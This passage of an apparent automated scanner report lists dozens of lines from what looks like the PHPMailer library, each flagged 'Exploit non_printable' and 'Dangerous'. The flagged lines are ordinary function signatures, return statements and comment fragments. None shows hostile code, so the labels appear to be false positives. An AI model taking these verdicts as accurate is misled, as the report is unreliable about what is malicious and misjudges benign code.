</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1075</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$this</span><span style="color: #007700">-></span><span style="color: #0000BB">addOrEnqueueAnAddress</span><span style="color: #007700">(</span><span style="color: #DD0000">'cc'</span><span style="color: #007700">, </span><span style="color: #0000BB">$address</span><span style="color: #007700">, </span><span style="color: #0000BB">$name</span><span style="color: #007700">);</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1085</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">addBCC</span><span style="color: #007700">(</span><span style="color: #0000BB">$address</span><span style="color: #007700">, </span><span style="color: #0000BB">$name </span><span style="color: #007700">= </span><span style="color: #DD0000">''</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1087</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$this</span><span style="color: #007700">-></span><span style="color: #0000BB">addOrEnqueueAnAddress</span><span style="color: #007700">(</span><span style="color: #DD0000">'bcc'</span><span style="color: #007700">, </span><span style="color: #0000BB">$address</span><span style="color: #007700">, </span><span style="color: #0000BB">$name</span><span style="color: #007700">);</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1096</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">addReplyTo</span><span style="color: #007700">(</span><span style="color: #0000BB">$address</span><span style="color: #007700">, </span><span style="color: #0000BB">$name </span><span style="color: #007700">= </span><span style="color: #DD0000">''</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1098</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$this</span><span style="color: #007700">-></span><span style="color: #0000BB">addOrEnqueueAnAddress</span><span style="color: #007700">(</span><span style="color: #DD0000">'Reply-To'</span><span style="color: #007700">, </span><span style="color: #0000BB">$address</span><span style="color: #007700">, </span><span style="color: #0000BB">$name</span><span style="color: #007700">);</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1104</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function), </span><span style="color: #0000BB">addition of such addresses is delayed until send</span><span style="color: #007700">().</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1105</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">false</span><span style="color: #007700">, </span><span style="color: #0000BB">but </span><span style="color: #007700">do </span><span style="color: #0000BB">not </span><span style="color: #007700">throw </span><span style="color: #0000BB">exceptions</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1113</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">addOrEnqueueAnAddress</span><span style="color: #007700">(</span><span style="color: #0000BB">$kind</span><span style="color: #007700">, </span><span style="color: #0000BB">$address</span><span style="color: #007700">, </span><span style="color: #0000BB">$name</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1144</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">call_user_func_array</span><span style="color: #007700">(array(</span><span style="color: #0000BB">$this</span><span style="color: #007700">, </span><span style="color: #DD0000">'addAnAddress'</span><span style="color: #007700">), </span><span style="color: #0000BB">$params</span><span style="color: #007700">);</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1157</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">addAnAddress</span><span style="color: #007700">(</span><span style="color: #0000BB">$kind</span><span style="color: #007700">, </span><span style="color: #0000BB">$address</span><span style="color: #007700">, </span><span style="color: #0000BB">$name </span><span style="color: #007700">= </span><span style="color: #DD0000">''</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1195</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function if </span><span style="color: #0000BB">the IMAP extension is available</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1199</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return array</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1202</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">parseAddresses</span><span style="color: #007700">(</span><span style="color: #0000BB">$addrstr</span><span style="color: #007700">, </span><span style="color: #0000BB">$useimap </span><span style="color: #007700">= </span><span style="color: #0000BB">true</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1205</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">function_exists</span><span style="color: #007700">(</span><span style="color: #DD0000">'imap_rfc822_parse_adrlist'</span><span style="color: #007700">)) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1244</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$addresses</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1252</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">isHTML</span><span style="color: #007700">(</span><span style="color: #0000BB">$isHtml </span><span style="color: #007700">= </span><span style="color: #0000BB">true</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1273</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">setFrom</span><span style="color: #007700">(</span><span style="color: #0000BB">$address</span><span style="color: #007700">, </span><span style="color: #0000BB">$name </span><span style="color: #007700">= </span><span style="color: #DD0000">''</span><span style="color: #007700">, </span><span style="color: #0000BB">$auto </span><span style="color: #007700">= </span><span style="color: #0000BB">true</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1300</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">Return </span><span style="color: #0000BB">the Message</span><span style="color: #007700">-</span><span style="color: #0000BB">ID header of the last email</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1304</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">string</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1306</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">getLastMessageID</span><span style="color: #007700">()</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1308</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$this</span><span style="color: #007700">-></span><span style="color: #0000BB">lastMessageID</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1322</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function(</span><span style="color: #0000BB">$address</span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1323</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return (</span><span style="color: #0000BB">strpos</span><span style="color: #007700">(</span><span style="color: #0000BB">$address</span><span style="color: #007700">, </span><span style="color: #DD0000">'@'</span><span style="color: #007700">) !== </span><span style="color: #0000BB">false</span><span style="color: #007700">);</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1330</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">validateAddress</span><span style="color: #007700">(</span><span style="color: #0000BB">$address</span><span style="color: #007700">, </span><span style="color: #0000BB">$patternselect </span><span style="color: #007700">= </span><span style="color: #0000BB">null</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1336</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">call_user_func</span><span style="color: #007700">(</span><span style="color: #0000BB">$patternselect</span><span style="color: #007700">, </span><span style="color: #0000BB">$address</span><span style="color: #007700">);</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1352</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">function_exists</span><span style="color: #007700">(</span><span style="color: #DD0000">'extension_loaded'</span><span style="color: #007700">) and </span><span style="color: #0000BB">extension_loaded</span><span style="color: #007700">(</span><span style="color: #DD0000">'pcre'</span><span style="color: #007700">)) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1372</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return (boolean)</span><span style="color: #0000BB">preg_match</span><span style="color: #007700">(</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1412</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return (</span><span style="color: #0000BB">strlen</span><span style="color: #007700">(</span><span style="color: #0000BB">$address</span><span style="color: #007700">) >= </span><span style="color: #0000BB">3</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1417</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return (boolean)</span><span style="color: #0000BB">filter_var</span><span style="color: #007700">(</span><span style="color: #0000BB">$address</span><span style="color: #007700">, </span><span style="color: #0000BB">FILTER_VALIDATE_EMAIL</span><span style="color: #007700">);</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1424</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">bool </span><span style="color: #DD0000">"true" </span><span style="color: #007700">if </span><span style="color: #0000BB">required functions </span><span style="color: #007700">for </span><span style="color: #0000BB">IDN support are present</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1426</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">idnSupported</span><span style="color: #007700">()</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1428</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function for </span><span style="color: #0000BB">PHP </span><span style="color: #007700"><= </span><span style="color: #0000BB">5.2</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1429</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">function_exists</span><span style="color: #007700">(</span><span style="color: #DD0000">'idn_to_ascii'</span><span style="color: #007700">) and </span><span style="color: #0000BB">function_exists</span><span style="color: #007700">(</span><span style="color: #DD0000">'mb_convert_encoding'</span><span style="color: #007700">);</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1435</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">silently returns unmodified address </span><span style="color: #007700">if:</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1437</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">functions are not available</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1441</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">string The encoded address in ASCII form</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1443</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">punyencodeAddress</span><span style="color: #007700">(</span><span style="color: #0000BB">$address</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1445</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">functions</span><span style="color: #007700">, </span><span style="color: #0000BB">CharSet</span><span style="color: #007700">, and </span><span style="color: #0000BB">at</span><span style="color: #007700">-</span><span style="color: #0000BB">sign</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1456</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">substr</span><span style="color: #007700">(</span><span style="color: #0000BB">$address</span><span style="color: #007700">, </span><span style="color: #0000BB">0</span><span style="color: #007700">, </span><span style="color: #0000BB">$pos</span><span style="color: #007700">) . </span><span style="color: #0000BB">$punycode</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1460</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$address</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1467</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">boolean false on error </span><span style="color: #007700">- </span><span style="color: #0000BB">See the ErrorInfo property </span><span style="color: #007700">for </span><span style="color: #0000BB">details of the error</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1469</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">send</span><span style="color: #007700">()</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1475</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$this</span><span style="color: #007700">-></span><span style="color: #0000BB">postSend</span><span style="color: #007700">();</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1491</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">preSend</span><span style="color: #007700">()</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1591</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">postSend</span><span style="color: #007700">()</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1598</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$this</span><span style="color: #007700">-></span><span style="color: #0000BB">sendmailSend</span><span style="color: #007700">(</span><span style="color: #0000BB">$this</span><span style="color: #007700">-></span><span style="color: #0000BB">MIMEHeader</span><span style="color: #007700">, </span><span style="color: #0000BB">$this</span><span style="color: #007700">-></span><span style="color: #0000BB">MIMEBody</span><span style="color: #007700">);</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1600</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$this</span><span style="color: #007700">-></span><span style="color: #0000BB">smtpSend</span><span style="color: #007700">(</span><span style="color: #0000BB">$this</span><span style="color: #007700">-></span><span style="color: #0000BB">MIMEHeader</span><span style="color: #007700">, </span><span style="color: #0000BB">$this</span><span style="color: #007700">-></span><span style="color: #0000BB">MIMEBody</span><span style="color: #007700">);</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1602</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$this</span><span style="color: #007700">-></span><span style="color: #0000BB">mailSend</span><span style="color: #007700">(</span><span style="color: #0000BB">$this</span><span style="color: #007700">-></span><span style="color: #0000BB">MIMEHeader</span><span style="color: #007700">, </span><span style="color: #0000BB">$this</span><span style="color: #007700">-></span><span style="color: #0000BB">MIMEBody</span><span style="color: #007700">);</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1606</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$this</span><span style="color: #007700">-></span><span style="color: #0000BB">$sendMethod</span><span style="color: #007700">(</span><span style="color: #0000BB">$this</span><span style="color: #007700">-></span><span style="color: #0000BB">MIMEHeader</span><span style="color: #007700">, </span><span style="color: #0000BB">$this</span><span style="color: #007700">-></span><span style="color: #0000BB">MIMEBody</span><span style="color: #007700">);</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1630</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">sendmailSend</span><span style="color: #007700">(</span><span style="color: #0000BB">$header</span><span style="color: #007700">, </span><span style="color: #0000BB">$body</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1704</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">isShellSafe</span><span style="color: #007700">(</span><span style="color: #0000BB">$string</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1731</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">functions that access local file paths</span><span style="color: #007700">,</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1736</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
